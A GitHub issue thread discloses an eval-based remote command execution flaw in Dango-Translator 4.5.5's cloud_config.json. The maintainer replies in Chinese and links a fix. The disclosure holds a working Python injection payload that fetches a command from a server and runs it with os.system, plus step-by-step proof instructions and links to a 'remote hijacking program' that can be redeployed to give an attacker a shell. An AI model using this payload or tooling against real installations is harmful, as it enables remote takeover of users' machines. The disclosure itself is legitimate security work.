### ISSUE TITLE
[Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5

### ISSUE THREAD

**Issue by Leeyangee** [PantsuDango/Dango-Translator#127]
Vulnerability Product: Dango-Translator Ver4.5.5
Vulnerability version: Ver4.5.5
Vulnerability type: Hijacked Remote Command Execute
Vulnerability Details:
Vulnerability location: app/config/cloud_config.json

withoud check the xxxUse variable in app/config/cloud_config.json and eval it ,unsafe config may causes Hijacked Remote Command Execute
<img width="1070" alt="image" src="https://github.com/PantsuDango/Dango-Translator/assets/101627018/9a796e6e-c8fe-43fd-86c8-cef342d61f11">
<img width="544" alt="image" src="https://github.com/PantsuDango/Dango-Translator/assets/101627018/57a28c1d-e109-43a4-a075-1fd185f9751d">

client payload : `"__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"`
remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe
remote hijacking program original code : https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProject

## [](#header-3)PROVE: 

Firstly download a Dango-Translator Ver4.5.5
Run the program to generate config
![image](https://github.com/PantsuDango/Dango-Translator/assets/101627018/b6ae256e-7326-47d2-899f-a4b4a8a0de01)

Secondly go to app/config/cloud_config.json, replace value of xxxUse with client payload,
here replace `"tencentwebUse": "False"` with ` "tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"`
![image](https://github.com/PantsuDango/Dango-Translator/assets/101627018/448ed9b5-e653-447a-a77c-29f43ad35b6f)

Thirdly download remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running
(This is a remote hijacking program, so you can deploy it on server but need to change IP_DOMAIN in original_code and url in client payload and re-compile it)
<img width="353" alt="image" src="https://github.com/PantsuDango/Dango-Translator/assets/101627018/77896606-cf74-45a1-821e-4bebe5f758be">

Fourthly run "团子翻译器.exe", after login in, windows pops up a calculator(because remote hijacking program runs "calc" command  on the client)
![image](https://github.com/PantsuDango/Dango-Translator/assets/101627018/428002d5-3b32-4fda-8953-39a7e5309e4d)

Once the client login in, the remote hijacking program could detect it and run command on the client

proved Hijacked Remote Command Execute

## [](#header-3)REASON: 

the client  payload is divided into these parts
<img width="1202" alt="屏幕截图 2023-07-17 133811" src="https://github.com/PantsuDango/Dango-Translator/assets/101627018/6ff22d50-8e4b-44ee-91bc-e667a3c375aa">

the result of eval(client payload) is it self, because "tencentwebUse" will be evaled before exit
![image](https://github.com/PantsuDango/Dango-Translator/assets/101627018/c6373486-91ca-48bd-ab85-8c60469e3f58)
<img width="568" alt="image" src="https://github.com/PantsuDango/Dango-Translator/assets/101627018/e34967dc-a7d6-475a-8e10-adf45767ee7e">

## [](#header-3)Harm: 

attackers could replace payload in order to let client respond a shell to attackers
so attackers could directly obtain shell and get server permissions

discovered by leeya_bug

**Comment by PantsuDango** [comment]
非常非常感谢您提出这个安全隐患，确实是我的疏忽，没太在意可能被利用。
事实上 eval 函数是一个非常危险的函数，我应该尽可能避免在代码里使用它。
因此我完全采纳了你的意见，修复了代码里所有使用 eval 的地方。

相关修复已推送 [commit](https://github.com/PantsuDango/Dango-Translator/commit/2114c311bef3ce0fff9d6e044b0aa30be3821917) 

再次感谢您！
